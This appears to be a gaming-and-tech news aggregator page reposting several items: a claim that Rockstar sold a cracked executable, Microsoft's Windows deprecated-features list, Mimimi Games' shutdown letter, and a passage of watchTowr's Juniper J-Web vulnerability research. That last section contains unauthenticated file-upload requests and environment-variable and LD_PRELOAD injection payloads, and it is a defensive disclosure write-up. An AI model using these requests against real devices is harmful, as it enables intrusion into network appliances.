0 comments
184 views

Rockstar selling you cracked copies on Steam

By SeedTheNet, in Gaming, September 7, 2023

Before it happened with Rockstar , it seems that it's happening again as reported by Twitter User Silent
The screenshot which is taken by Silent can show that the executable that is being used is cracked by RAZOR 1911

The irony of this that Rockstar and Take Two fights Piracy with their full power at anytime , the decision to use a cracked executable from cracker group is quite astonishing , where a multi-billion dollar company will have to go use a crack and then sell the cracked game to people.
To continue the comedy , an account on Twitter with the name of Razor 1911 , could be official and could be not has posted this :
And then game companies wonder why people will prefer Pirating the game over buying a pirated game or a game protected by a DRM that will trouble you more than makes your experience easier since you paid money.
Bravo to Rockstar! and do NOT sell Warez.

Thanks to Silent and RAZOR 1911.

Read more...
0 comments
207 views

Deprecated features for Windows client - Microsoft is retiring Wordpad after 28 years

By SeedTheNet, in General, September 5, 2023

Microsoft is also now retiring WordPad after 28 years of service
Goodbye Wordpad.
Each version of Windows client adds new features and functionality. Occasionally, new versions also remove features and functionality, often because they've added a newer option. This article provides details about the features and functionalities that are no longer being developed in Windows client. For more information about features that have been removed, see Windows features removed.
For more information about features in Windows 11, see Feature deprecations and removals.
To understand the distinction between deprecation and removal, see Windows client features lifecycle.
The features in this article are no longer being actively developed, and might be removed in a future update. Some features have been replaced with other features or functionality and some are now available from other sources.
Deprecated features
The following list is subject to change and might not include every affected feature or functionality.
Note
If you have feedback about the proposed replacement of any of these features, you can use the Feedback Hub app.
Feature Details and mitigation Deprecation announced WordPad WordPad is no longer being updated and will be removed in a future release of Windows. We recommend Microsoft Word for rich text documents like .doc and .rtf and Windows Notepad for plain text documents like .txt. September 1, 2023 AllJoyn Microsoft's implementation of AllJoyn which included the Windows.Devices.AllJoyn API namespace, a Win32 API, a management configuration service provider (CSP), and an Alljoyn Router Service has been deprecated. AllJoyn, sponsored by AllSeen Alliance, was an open source discovery and communication protocol for Internet of Things scenarios such as turning on/off lights or reading temperatures.AllSeen Alliance promoted the AllJoyn project from 2013 until 2016 when it merged with the Open Connectivity Foundation (OCF), the sponsors of Iotivity.org, another protocol for Internet of Things scenarios. Customers should refer to the Iotivity.org website for alternatives such as Iotivity Lite or Iotivity. August 17, 2023 TLS 1.0 and 1.1 Over the past several years, internet standards and regulatory bodies have deprecated or disallowed TLS versions 1.0 and 1.1 due to various security issues. Starting in Windows 11 Insider Preview builds for September 2023 and continuing in future Windows OS releases, TLS 1.0 and 1.1 will be disabled by default. This change increases the security posture of Windows customers and encourages modern protocol adoption. For organizations that need to use these versions, there's an option to re-enable TLS 1.0 or TLS 1.1. For more information, see Resources for deprecated features. August 1, 2023 Cortana in Windows Cortana in Windows as a standalone app is deprecated. This change only impacts Cortana in Windows, and your productivity assistant, Cortana, will continue to be available in Outlook mobile, Teams mobile, Microsoft Teams display, and Microsoft Teams rooms. June 2023 Microsoft Support Diagnostic Tool (MSDT) MSDT is deprecated and will be removed in a future release of Windows. MSDT is used to gather diagnostic data for analysis by support professionals. For more information, see Resources for deprecated features January 2023 Universal Windows Platform (UWP) Applications for 32-bit Arm This change is applicable only to devices with an Arm processor, for example Snapdragon processors from Qualcomm. If you have a PC built with a processor from Intel or AMD, this content is not applicable. If you are not sure which type of processor you have, check Settings > System > About.

Support for 32-bit Arm versions of applications will be removed in a future release of Windows 11. After this change, for the small number of applications affected, app features might be different and you might notice a difference in performance. For more technical details about this change, see Update app architecture from Arm32 to Arm64. January 2023 Update Compliance Update Compliance, a cloud-based service for the Windows client, is no longer being developed. This service has been replaced with Windows Update for Business reports, which provides reporting on client compliance with Microsoft updates from the Azure portal. November 2022 Windows Information Protection Windows Information Protection will no longer be developed in future versions of Windows. For more information, see Announcing sunset of Windows Information Protection (WIP).

For your data protection needs, Microsoft recommends that you use Microsoft Purview Information Protection and Microsoft Purview Data Loss Prevention. July 2022 BitLocker To Go Reader Note: BitLocker to Go as a feature is still supported.
Reading of BitLocker-protected removable drives (BitLocker To Go) from Windows XP or Windows Vista in later operating systems is deprecated and might be removed in a future release of Windows client.
The following items might not be available in a future release of Windows client:
- ADMX policy: Allow access to BitLocker-protected removable data drives from earlier versions of Windows
- Command line parameter: manage-bde -DiscoveryVolumeType (-dv)
- Catalog file: c:\windows\BitLockerDiscoveryVolumeContents
- BitLocker 2 Go Reader app: bitlockertogo.exe and associated files 21H1 Personalization roaming Roaming of Personalization settings (including wallpaper, slideshow, accent colors, and lock screen images) is no longer being developed and might be removed in a future release. 21H1 Windows Management Instrumentation Command line (WMIC) tool. The WMIC tool is deprecated in Windows 10, version 21H1 and the 21H1 General Availability Channel release of Windows Server. This tool is superseded by Windows PowerShell for WMI. Note: This deprecation only applies to the command-line management tool. WMI itself isn't affected. 21H1 Timeline Starting in July 2021, if you have your activity history synced across your devices through your Microsoft account (MSA), you can't upload new activity in Timeline. For more information, see Get help with timeline. 20H2 Microsoft Edge The legacy version of Microsoft Edge is no longer being developed. 2004 Companion Device Framework The Companion Device Framework is no longer under active development. 2004 Dynamic Disks The Dynamic Disks feature is no longer being developed. This feature will be fully replaced by Storage Spaces in a future release. 2004 Microsoft BitLocker Administration and Monitoring (MBAM) Microsoft BitLocker Administration and Monitoring (MBAM), part of the Microsoft Desktop Optimization Pack (MDOP) is no longer being developed. September, 2019 Language Community tab in Feedback Hub The Language Community tab will be removed from the Feedback Hub. The standard feedback process: Feedback Hub - Feedback is the recommended way to provide translation feedback. 1909 My People / People in the Shell My People is no longer being developed. It may be removed in a future update. 1909 Package State Roaming (PSR) PSR will be removed in a future update. PSR allows non-Microsoft developers to access roaming data on devices, enabling developers of UWP applications to write data to Windows and synchronize it to other instantiations of Windows for that user.

The recommended replacement for PSR is Azure App Service. Azure App Service is widely supported, well documented, reliable, and supports cross-platform/cross-ecosystem scenarios such as iOS, Android and web.

PSR was removed in Windows 11. 1909 XDDM-based remote display driver The Remote Desktop Services uses a Windows Display Driver Model (WDDM) based Indirect Display Driver (IDD) for a single session remote desktop. The support for Windows 2000 Display Driver Model (XDDM) based remote display drivers will be removed in a future release. Independent Software Vendors that use an XDDM-based remote display driver should plan a migration to the WDDM driver model. For more information on implementing remote display indirect display driver, check out Updates for IddCx versions 1.4 and later. 1903 Taskbar settings roaming Roaming of taskbar settings is no longer being developed and we plan to remove this capability in a future release. 1903 Wi-Fi WEP and TKIP Since the 1903 release, a warning message has appeared when connecting to Wi-Fi networks secured with WEP or TKIP (which aren't as secure as those using WPA2 or WPA3). In a future release, any connection to a Wi-Fi network using these old ciphers will be disallowed. Wi-Fi routers should be updated to use AES ciphers, available with WPA2 or WPA3. 1903 Windows To Go Windows To Go is no longer being developed.

The feature doesn't support feature updates and therefore doesn't enable you to stay current. It also requires a specific type of USB that is no longer supported by many OEMs. 1903 Print 3D app 3D Builder is the recommended 3D printing app. To 3D print objects on new Windows devices, customers must first install 3D Builder from the Store. 1903 Companion device dynamic lock APIS The companion device framework (CDF) APIs enable wearables and other devices to unlock a PC. In Windows 10, version 1709, we introduced Dynamic Lock, including an inbox method using Bluetooth to detect whether a user is present and lock or unlock the PC. Because of this reason, and because non-Microsoft partners didn't adopt the CDF method, we're no longer developing CDF Dynamic Lock APIs. 1809 OneSync service The OneSync service synchronizes data for the Mail, Calendar, and People apps. We've added a sync engine to the Outlook app that provides the same synchronization. 1809 Snipping Tool The Snipping Tool is an application included in Windows 10 that is used to capture screenshots, either the full screen or a smaller, custom "snip" of the screen. In Windows 10, version 1809, we're introducing a new universal app, Snip & Sketch. It provides the same screen snipping abilities plus other features. You can launch Snip & Sketch directly and start a snip from there, or just press WIN + Shift + S. Snip & Sketch can also be launched from the "Screen snip" button in the Action Center. We're no longer developing the Snipping Tool as a separate app but are instead consolidating its functionality into Snip & Sketch. 1809 Software Restriction Policies in Group Policy Instead of using the Software Restriction Policies through Group Policy, you can use AppLocker or Windows Defender Application Control to control which apps users can access and what code can run in the kernel. 1803 Offline symbol packages (Debug symbol MSIs) We're no longer making the symbol packages available as a downloadable MSI. Instead, the Microsoft Symbol Server is moving to be an Azure-based symbol store. If you need the Windows symbols, connect to the Microsoft Symbol Server to cache your symbols locally or use a manifest file with SymChk.exe on a computer with internet access. 1803 Windows Help Viewer (WinHlp32.exe) All Windows help information is available online. The Windows Help Viewer is no longer supported in Windows 10. For more information, see Error opening Help in Windows-based programs: "Feature not included" or "Help not supported". 1803 MBAE service metadata The MBAE app experience is replaced by an MO UWP app. For more information, see Developer guide for creating service metadata 1803 Contacts feature in File Explorer We're no longer developing the Contacts feature or the corresponding Windows Contacts API. Instead, you can use the People app in Windows 10 to maintain your contacts. 1803 Phone Companion Use the Phone page in the Settings app. In Windows 10, version 1709, we added the new Phone page to help you sync your mobile phone with your PC. It includes all the Phone Companion features. 1803 IPv4/6 Transition Technologies (6to4, ISATAP, Teredo, and Direct Tunnels) 6to4 has been disabled by default since Windows 10, version 1607 (the Anniversary Update), ISATAP has been disabled by default since Windows 10, version 1703 (the Creators Update), Teredo has been disabled since Windows 10, version 1803. The Direct Tunnels feature has always been disabled by default. Use native IPv6 support instead. 1803 Layered Service Providers Layered Service Providers haven't been developed since Windows 8 and Windows Server 2012. Use the Windows Filtering Platform instead. When you upgrade from an older version of Windows, any layered service providers you're using aren't migrated; you'll need to reinstall them after upgrading. 1803 Business Scanning This feature is also called Distributed Scan Management (DSM) (Added 05/03/2018)

The Scan Management functionality was introduced in Windows 7 and enabled secure scanning and the management of scanners in an enterprise. We're no longer investing in this feature, and there are no devices available that support it. 1803 IIS 6 Management Compatibility* We recommend that users use alternative scripting tools and a newer management console. 1709 IIS Digest Authentication We recommend that users use alternative authentication methods. 1709 RSA/AES Encryption for IIS We recommend that users use CNG encryption provider. 1709 Screen saver functionality in Themes Disabled in Themes. Screen saver functionality in Group Policies, Control Panel, and Sysprep continues to be functional. Lock screen features and policies are preferred. 1709 Sync your settings (updated: August 17, 2017) Back-end changes: In future releases, the back-end storage for the current sync process will change. A single cloud storage system will be used for Enterprise State Roaming and all other users. The Sync your settings options and the Enterprise State Roaming feature will continue to work. 1709 System Image Backup (SIB) Solution This feature is also known as the Backup and Restore (Windows 7) legacy control panel. For full-disk backup solutions, look for a third-party product from another software vendor. You can also use OneDrive to sync data files with Microsoft 365. 1709 TLS RC4 Ciphers To be disabled by default. For more information, see TLS (Schannel SSP) changes in Windows 10 and Windows Server 2016 1709 Trusted Platform Module (TPM) Owner Password Management This functionality within TPM.msc will be migrated to a new user interface. 1709 Trusted Platform Module (TPM): TPM.msc and TPM Remote Management To be replaced by a new user interface in a future release. 1709 Trusted Platform Module (TPM) Remote Management This functionality within TPM.msc will be migrated to a new user interface. 1709 Windows Hello for Business deployment that uses Microsoft Configuration Manager Windows Server 2016 Active Directory Federation Services - Registration Authority (ADFS RA) deployment is simpler and provides a better user experience and a more deterministic certificate enrollment experience. 1709 Windows PowerShell 2.0 Applications and components should be migrated to PowerShell 5.0+. 1709 Apndatabase.xml Apndatabase.xml is being replaced by the COSA database. Therefore, some constructs will no longer function. This replacement includes Hardware ID, incoming SMS messaging rules in mobile apps, a list of privileged apps in mobile apps, autoconnect order, APN parser, and CDMAProvider ID. 1703 Tile Data Layer The Tile Data Layer database stopped development in Windows 10, version 1703. 1703 TLS DHE_DSS ciphers DisabledByDefault TLS RC4 Ciphers will be disabled by default in this release. 1703 TCPChimney TCP Chimney Offload is no longer being developed. See Performance Tuning Network Adapters. 1703 IPsec Task Offload IPsec Task Offload versions 1 and 2 are no longer being developed and shouldn't be used. 1703 wusa.exe /uninstall /kb:####### /quiet The wusa tool usage to quietly uninstall an update has been deprecated. The uninstall command with /quiet switch fails with event ID 8 in the Setup event log. Uninstalling updates quietly could be a security risk because malicious software could quietly uninstall an update in the background without user intervention.

Source:
https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features
1507
Applies to Windows Server 2016 and Windows Server 2019.

Read more...
0 comments
189 views

Mimimi Games Shutting Down

By SeedTheNet, in Gaming, August 30, 2023

Mimimi’s Final Game
Dear community, team and industry,
It is with a heavy heart that today we have to share the news that Shadow Gambit: The Cursed Crew will be Mimimi’s final game.
As we look back at our 15-year journey crafting games (and crying about it), we feel grateful for the incredible love and support we received from all of you. We cherished every game we made and feel proud of what we were able to accomplish as a studio.
At the same time, dedicating the past decade and a half of our lives working on increasingly ambitious games took a heavy personal toll on us and our families. After the release of Shadow Gambit we decided it was the right time to prioritize our well-being and to pull the brakes instead of signing up for another multi-year production cycle.
While this means that we won’t start production on a new big game, we will continue to fully support Shadow Gambit. We are already working on a patch across all platforms and have a big content drop planned for later this year, which we are sure you will love just as much as we do!
This also means we will be slowly ramping down the studio over the next few months. We shared this decision with the whole team at an on-site meeting before releasing this announcement.
We will be doing everything in our power to support our team, and we are now starting to reach out to our friends in the industry to find suitable new jobs for all Mimimis. If you have open positions and are interested in hiring our amazing talents, please get in touch via hiring@mimimi.games.
Thanks to the recent launch of Shadow Gambit, we are also able to pay out a bonus to all employees to help them during their transition.
We want to thank our community and fans for playing our games and engaging with us. Your joy and support were what fueled our passion!
We want to thank our industry peers that helped us along all stages of this company, from founding it to self-publishing for the first time. Your mentoring was pivotal for our success!
We want to thank all our business partners, especially Kowloon Nights, THQ Nordic and Daedalic Entertainment, as well as all external partners and companies that have worked with us. Also, thanks to both the Bavarian regional games fund FFF Bayern and the German games grant of the BMWK. Without the funding, skills and assistance from all of you, this journey wouldn’t have been possible.
And, most of all, we want to thank the whole team and everyone who worked with us in any capacity on these games. You made Mimimi what it was!
We are now focused on delivering the additional content for Shadow Gambit and fulfilling our duties as Managing Directors of the company – to our team, our fans and our business partners, in the most supportive way we can.
And while we don’t know what the future will hold for the both of us, we still love video games.
We had a really good run and we are truly grateful for all of this!
Thank you!
Dominik and Johannes
Why is this happening?
Making these games was amazing and extremely taxing at the same time. Reaching the level of quality Mimimi strives for is hard and requires focus and dedication. We also have to acknowledge that our future production costs are growing faster than potential revenues of our genre. The increased financial pressure and level of risk became unsustainable. Additionally, whenever our games got close to release and were finally fun to play, a new fight for funding of the following projects started, making this a continuous cycle.
Since 2011 and pitching The Last Tinker, there never was any down-time for either of us.
As founders and directors, we found it increasingly difficult to strike a balance between fulfilling internal expectations for the studio and being available for our young families. Meeting our goals of quality, company culture and management requires a constant level of energy that we simply can’t provide anymore.
Ramping down the company and making Shadow Gambit our final game is an extremely tough decision. We never expected this would be how Mimimi ends. But if even one of us were to break down, fail or burn out, the situation would escalate quickly. Ultimately, managing a production on this scale, in combination with an extremely competitive market, proved to be too taxing for us.
In light of all of the above, we decided to pull the brakes.
Why not change the genre?
Working in a new genre would increase risks and stress-levels across the whole team even further. It’s already hard enough to make great Stealth Strategy games, and we are simply lacking the experience of working on other genres.
Will I still be able to buy your games in the future?
Yes. All our games will remain available on all platforms.
Didn’t you receive the German games grant for developing this game?
Yes. We are incredibly thankful for the opportunity, without which this game wouldn’t even exist. With help of the grant of the BMWK, we delivered an excellent title that you can play for many hours and which surely will be played for many years.
Developing and self-publishing this game was an amazing experience and the whole team learned a lot and achieved a milestone in their career!
Can I rent your awesome office? Can I buy your high-quality furniture and hardware?
Yes, please get in touch.
Thank you for reading and caring!
Posted August 29, 2023 by Johannes Roth
https://www.mimimi.games/our-final-game/
----
Check out Mimimi Games at Steam : https://store.steampowered.com/developer/mimimi

mimimi games

Read more...
0 comments
151 views

CVE-2023-36844 And Friends: RCE In Juniper Devices - WatchTowr Labs

By SeedTheNet, in Security, August 29, 2023

As part of our Continuous Automated Red Teaming and Attack Surface Management technology - the watchTowr Platform - we're incredibly proud of our ability to discover nested, exploitable vulnerabilities across huge attack surfaces.
Through our rapid PoC process, we enable our clients to understand if they are vulnerable to emerging weaknesses before active, indiscriminate exploitation can begin - continuously.
Because of this, a recent out-of-cycle Juniper security bulletin caught our attention, describing two bugs which, although only a 5.3 on the CVSS scale individually, supposedly could be combined for RCE (with a combined rating of 9.8 within CVSSv3 - we didn't know this was possible but anyway).

We're no strangers to "next-gen" firewalls and switches here at watchTowr (see our recent healthy obsession with Fortinet), and thus we are equally not strangers to the prolific nature of the bugs that seem to live in these so-called 'hardened appliances and devices'. As we are hopefully slowly demonstrating, these 'hardened appliances' are often the softest route into a network for an advanced attacker.
The bulletin actually contains four CVEs, as the two bugs apply to two separate platforms (the -EX switches and -SRX firewall devices). We'll focus just on the -SRX bugs, as we expect the -EX bugs to be identical. These are two individual flaws.
For the uninitiated, or those that don't spend their days browsing catalogues, Juniper -EX devices are switches, and -SRX devices are firewalls, "powered by Junos® OS" and according to Juniper are an "integral part of Juniper Connected Security framework that protects your remote office, branch, campus, data center, and cloud by extending security to every point of connection on the network". Yes.
Anyway, back to the bulletin and the vulnerabilities described within.
The first, CVE-2023-36846, is described as a "Missing Authentication for Critical Function vulnerability", while the second, CVE-2023-36845, is described as a "PHP External Variable Modification vulnerability".
These, put mildly, sound interesting. Being the responsible, friendly hackers that we are, we decided to investigate in order to provide network administrators with more information to aid in the recurring 'patch or no patch' decision, and to aid in patch verification.
As of the time of writing, there is very little information available other than the terse security bulletin. Great!~

First Impressions

Since the advisory indicates that a workaround is to 'disable J-Web', we'll start there. J-Web is the web-based UI that can be used to configure the appliance by those who are reluctant to jump into the appliance's CLI interface.
Taking the metaphorical lid off the appliance quickly reveals that J-Web is almost entirely written in PHP, a language with a well-earned historic reputation of prioritising usability and ease-of-development over security.
Editors note: PHP is a great language, Aliz and Sonny are not enlightened.
A quick scroll through the PHP code suggests an ill-maintained platform, and indeed, very quickly we see thousands of 'code smells', mostly harmless typos and mistakes that don't impact functionality, but cause us to reduce confidence in the codebase. Comments such as "This is a hack until 9.4", found in version 22 of the codebase, suggest that proper care has not been taken to address technical debt accrued in the codebase's long 25-year lifespan.
We're not sure what's going on here, but it does not inspire confidence whatever it is:
//803142 function getLockerkey() { global $user; $keyvar = "js2nr0px1R2"; $sysVersion = $user->xnm->command('show version',true,true,null); $sysVersion = $user->transform->strip_ns($sysVersion); $modelNo = $user->xpath->get_xpath_node_value($sysVersion,'//software-information/product-model'); return base64_encode(substr($modelNo, 0, 6) . '$' . $keyvar); } and honestly, what is this?
// Changing raw variable to take only request type //$raw = trim(stripslashes(file_get_contents('php://input'))); $raw = $_POST['requestType']; $raw = substr($raw,1); $raw = 'requestType=>'.$raw; $input = array(); $input = explode("#@^",$raw); foreach($input as $arg) { $params = array(); $params = explode("=>",$arg); ${$params[0]} = $params[1]; } A quick look at most of the PHP files shows that authentication is managed by the user class, and the following pattern can be seen in most of the files that require authentication:
$user = new user(true); if (!$user->is_authenticated()) { return; } While straightforward and readable, this approach can be error-prone, as each file requires a similar snippet, and if omitted, access can be granted unintentionally. Hunting through the codebase, we find that most files have the correct checks implemented - with a number of exceptions, including webauth_operation.php, that do not.
Instead of authenticating via the user class, it instead invokes the sajax_handle_client_request, but critically it provides a value of false for the doauth parameter, meaning that authentication will not be performed.
"doauth: false"? Colour me interested!
Going back to the bug we're hunting, this seems to align with a 'Missing Authentication' condition - this could be the n-day tracked as CVE-2023-36846 that we are looking for!
Can we persuade this webauth_operation.php file to do our bidding without a requirement for pesky authentication?
Well, it turns out we can.

Of $internal_functions

This webauth_operation expects to receive a POST request containing two variables - rs and rsargs. As you might expect, the first conveys the name of the operation to be carried out, and the second specifies any arguments which that operation expects.
Here's what the calling code looks like. We can see that the $internal_functions array contains handlers for functions, keyed by function name:
//PR 826518, 1269932 $sajax_black_list_functions = Array ("sajax_handle_client_request", "sajax_init", "errmsg_format_serialized_events"); $internal_functions = get_defined_functions(); if (! is_callable($func_name) || !in_array($func_to_call,$internal_functions["user"]) || in_array($func_to_call,$sajax_black_list_functions)) echo "-:function not callable"; else { error_log("PERF: ".$func_name." Start: ".date('Y-m-d H:i:s.') . gettimeofday()['usec']); $result = call_user_func_array($func_name, $args); error_log("PERF: ".$func_name." End: ".date('Y-m-d H:i:s.') . gettimeofday()['usec']); if ($getQuery) echo $result ; else echo trim(sajax_get_js_repr($result)); } The 'dispatch' code which handles these operations, however, is not a simple associative array as one might expect, and so extracting a list of operations isn't as simple as it may seem. We decided the 'path of least resistance' was to modify the PHP source file, and print out a list of operations. However, this turned out to be slightly more work than we anticipated.
Firstly, we noted that the PHP files were read-only.
Initially we thought they were deliberately mounted as such, and could simply be remounted read-write, but a little more investigation revealed that they are stored on an lzma-compressed ISO (yes, as in iso9660) volume. Some work went into modifying the iso file, recompressing with BSD's mkuzip tool, and booting the modified system, only to find that the compressed iso was rejected on boot, as it failed a signature check. D'oh! Shortly after this, we realised that the JunOS device provides support for union mounts - similar to Linux's overlayFS - and we were able to simply use that to emulate a writable partition.
mkdir /root/writable mount_unionfs /root/writable /.mount/packages/mnt/jweb-srxtvp-29090167/jail/html/includes With the files now writable, it is easy to add a quick PHP statement to write the contents of the internal_functions array to the HTML response.
$internal_functions = get_defined_functions(); echo var_dump($internal_functions['user']); The result is almost 150 individual functions, spanning everything from simple helpers to format IP addresses to complex functions that interact with the appliance's CLI. One promising-looking candidate is the move_file function:
function move_file ($src, $dst, $overwrite = false, $copy = false) { global $user; $args = array( 'source' => $src, 'destination' => $dst ); if ($copy) { $rpc = 'file-copy'; } else { $rpc = 'file-move'; if ($overwrite) { $args['replace'] = 'replace'; } } $xml = $user->xnm->query($rpc, $args, false); if (strstr($xml, 'xnm:error')) { return $xml; } else { return null; } } While it does seem, at first glance, that this function is exactly the sort of 'interesting functionality' that we're looking for, unfortunately it is inaccessible to us. Attempting to invoke it results in a promising-looking HTTP 200 response, but no actual file moving takes places, and if we examine the the PHP log (/var/jail/sess/php.log) we see the following:
[25-Aug-2023 00:00:37 America/Los_Angeles] CACHING FLOW: query user not set.. This is a message from the junoscript class, which is the type of $user->xnm. Unfortunately, since we are not logged in, the junoscript class is not fully constructed, and we are unable to perform any queries over the RPC mechanism. This causes most of the interesting-looking internal_functions handlers to fail uninterestingly. Some of them, however, do not use the RPC mechanism to carry out their duty, and are thus able to run even though the junoscript is not fully logged in.

Interesting Internal Functions
We're at a convenient point now to circle back to the bug description of CVE-2023-36846, one of the bugs we are trying to reproduce. Let's take a close look at the vendor's advice:
With a specific request that doesn't require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system An arbitrary file upload bug. Taking a look through our list of $internal_functions, one stood out to us as being interesting in this context - one named do_upload, which is designed to handle the upload of a file.
It does, however, seem to be lacking any kind of authentication.
With no authentication requirement, we don't need any fancy tricks, and we can simply invoke the function as it is designed to be. It expects a single argument containing a JSON-encoded array. The array, as we can see in the code snippet below, should contain a fileName, a base64-encoded fileData, and a csize holding the target file size.
function do_upload($files) { $files = json_decode($files); foreach ($files as $file) { $fileData = $file->fileData; $intermediateSalt = md5(uniqid(rand(), true)); $salt = substr($intermediateSalt, 0, 6); $token = hash("sha256", $file->fileName . $salt); //$token = md5(uniqid(rand(), true)); $fileName = $token.getXSSEncodedValue($file->fileName); $fileName_extension = pathinfo($fileName, PATHINFO_EXTENSION); $fileName = $token . '.' . $fileName_extension; $csize = getXSSEncodedValue($file->csize); $fileData = substr($fileData, strpos($fileData, ",") + 1); $fileData = base64_decode($fileData); if (!check_filename($fileName, false)) { echo 'Invalid Filename'; return; } $cf = "/var/tmp/" . $fileName; $byte = 1024 * 1024 * 4; if(file_exists($cf)) unlink($cf); $fp = fopen($cf,'ab'); if(flock($fp,LOCK_EX | LOCK_NB)) { $ret = fwrite($fp,$fileData); flock($fp, LOCK_UN); } $rc = fclose($fp);//echo $ret;echo "|";echo $csize;die; if($ret == $csize) { $filenames['converted_fileName'][] = $fileName; $filenames['original_fileName'][] = $file->fileName; } else { $filenames[] = ''; //Error while uploading the file : miss-match in bytes } } return $filenames; } Performing a POST without authentication yields a helpful response, telling us our file has been uploaded:
POST /webauth_operation.php HTTP/1.1 Host: xxxxx Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 92 rs=do_upload&rsargs[]=[{"fileName": "test.txt", "fileData": ",aGk=", "csize": 2}] HTTP/1.1 200 OK ... +:{"converted_fileName": {0: '48cebc0d1548c854f2d5d52e65f3917f21e8c75894bcd9f9729c7322315f5ed0.txt'}, "original_fileName": {0: 'test.txt'}} Indeed, if we take a look on the appliance's filesystem, the file has been created with the correct contents. Neat.
root@:/ # cat /var/jail/tmp/48cebc0d1548c854f2d5d52e65f3917f21e8c75894bcd9f9729c7322315f5ed0.txt hi This is likely to be the first bug, CVE-2023-36846.
Attentive readers might be alarmed by the destination path of the file - the jail component suggests that the webserver is running in a BSD jail, which are a sort of Docker-like mechanism for isolating a processes userspace components (BSD proponents will no doubt want me to point out that jails predate Docker by a considerable margin, and I wouldn't want to risk offending them by omitting this otherwise-unrelated trivia). The jail doesn't actually get in our way very much as we progress with our research (and ultimately exploitation), but it's an important thing to bear in mind, as some paths later on will be relative to the jail root, /var/jail. This directory contains a full (albeit very minimal and stripped-down) userland for the operation of the webserver.
A Polluted Envonment
Satisfied that we've found the first bug, CVE-2023-36846, let's move on and look for the second, CVE-2023-36845. The vendor disclosure is terse:
Utilizing a crafted request an attacker is able to modify a certain PHP environment variable leading to partial loss of integrity, which may allow chaining to other vulnerabilities. While this bug sounds like it resides in PHP code itself - as one would expect - we actually found it in a totally different location - the webserver itself.
You may notice that the webserver is the GoAhead software, which has had its share of flaws. Most notably, older versions (below 3.6.5) are prone to an environment variable injection attack (see here and here if you understand Chinese). Although the version of httpd on the Juniper appliance reports its version as 8.1.3, this bug seems to fit the description of what we're looking for. Since the PoC is very simple, let's give it a try - maybe we'll get lucky (spoiler: we do!)
The bug itself is really simple. It allows an attacker to set any environment variable simply by specifying the name of an uploaded file. For example, given the following HTTP request:
POST /modules/configuration/wizards/interfaces/widgets/wl.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3J5uz6sSgaM1KIxB Content-Length: 145 ------WebKitFormBoundary3J5uz6sSgaM1KIxB Content-Disposition: form-data; name="TestEnvVar" hello. ------WebKitFormBoundary3J5uz6sSgaM1KIxB The CGI handler, in our case PHP, will be started with the TestEnvVar environment variable set to hello.. To verify this, we modified the PHP files on the appliance once again, inserting a phpinfo call into one of the source files, and invoked it with a POST request containing a file-type attachment:
POST /webauth_operation.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryngts3YOfQfRAEypQ Content-Length: 147 ------WebKitFormBoundaryngts3YOfQfRAEypQ Content-Disposition: form-data; name="TestEnvVar" hello. ------WebKitFormBoundaryngts3YOfQfRAEypQ-- Somewhat surprisingly, the phpinfo dump of environment variables shows that the environment variable has indeed been created!
why, hello to you, too!
This seems a bizarre situation, given the version numbering of the httpd binary. It is possible that the bug isn't actually in the GoAhead software at all, but rather in the Juniper-developed CGI glue. Either way, wherever the bug is, we've found it - we are able to 'pollute' the CGI environment by setting any environment variable we want to any content we wish. This is a pretty powerful primitive, and there are well-known ways of exploiting such a condition. Let's try them out.
Preloading Libraries
The usual exploit method for bugs of this class - the ability to set arbitrary environmental variables - is to set the LD_PRELOAD variable to point to a shared library file that we control. With the LD_PRELOAD variable set, the dynamic linker will helpfully pre-load the file we have under our control, giving us control over the machine.
In our case, we've uploaded a file into the filesystem already, using our previous bug.
Let's try it out! Note that we set the LD_LIBRARY_PATH to the /tmp directory, since it is relative to the jail root, and we set the LD_PRELOAD itself to the filename. We'll also set the LD_DEBUG variable so we can see what's going on if it fails - we've found this to be an invaluable resource when debugging anything relating to the dynamic linker.
POST /webauth_operation.php HTTP/1.1 ... ------WebKitFormBoundary3J5uz6sSgaM1KIxB Content-Disposition: form-data; name="ld_library_path" /tmp ------WebKitFormBoundary3J5uz6sSgaM1KIxB Content-Disposition: form-data; name="LD_PRELOAD" c2d9044eb69490365d370f0886fe7a30c608588acac21164e31319e046dd4f6e.so ------WebKitFormBoundary3J5uz6sSgaM1KIxB Content-Disposition: form-data; name="LD_DEBUG" ALL ------WebKitFormBoundary3J5uz6sSgaM1KIxB-- The response is somewhat disappointing:
HTTP/1.1 503 Service Unavailable ... /libexec/ld-elf.so.1 is initialized, base address = 0x82d000 RTLD dynamic = 0x84ece8 RTLD pltgot = 0 initializing thread locks _rtld_thread_init: done processing main program's program header note osrel 1201524 note fctl0 0 note crt_no_init AT_EXECPATH 0xffffdfe3 /usr/bin/php obj_main path /usr/bin/php Filling in DT_DEBUG entry /usr/bin/php valid_hash_sysv 1 valid_hash_gnu 1 dynsymcount 970 lm_init("(null)") lm_parse_file: open("/etc/libmap.conf") failed, No such file or directory loading LD_PRELOAD libraries Searching for "c2d9044eb69490365d370f0886fe7a30c608588acac21164e31319e046dd4f6e.so" lm_find("(null)", "/tmp") lmp_find("$DEFAULT$") Trying "/tmp/c2d9044eb69490365d370f0886fe7a30c608588acac21164e31319e046dd4f6e.so" Failed to open "/tmp/c2d9044eb69490365d370f0886fe7a30c608588acac21164e31319e046dd4f6e.so": Authentication error search_library_pathfds('c2d9044eb69490365d370f0886fe7a30c608588acac21164e31319e046dd4f6e.so', '(null)', fdp) ld-elf.so.1: Shared object "c2d9044eb69490365d370f0886fe7a30c608588acac21164e31319e046dd4f6e.so" not found What's going on here?! We can see that the dynamic linker has correctly located our library, but that it has failed with the error message "Authentication error".
Well, I'm not afraid to admit we spent quite some time debugging this failure.!
Eventually, in a moment of insight, we copied a legitimate binary from the system's /lib dir into the tmp directory, and attempted to invoke it - only to be met with the same Authentication error message:
root@:/var/jail/tmp # /lib/libfetch.so.6 Segmentation fault (core dumped) # That's okay, at least it's executing something root@:/var/jail/tmp # cp /lib/libfetch.so.6 . root@:/var/jail/tmp # ./libfetch.so.6 ./libfetch.so.6: Authentication error. # HUH?!

What's going on here? Our first thought was that the tmp filesystem was mounted with some kind of noexec flag, but that's not the case. What's preventing our binary from being loaded?
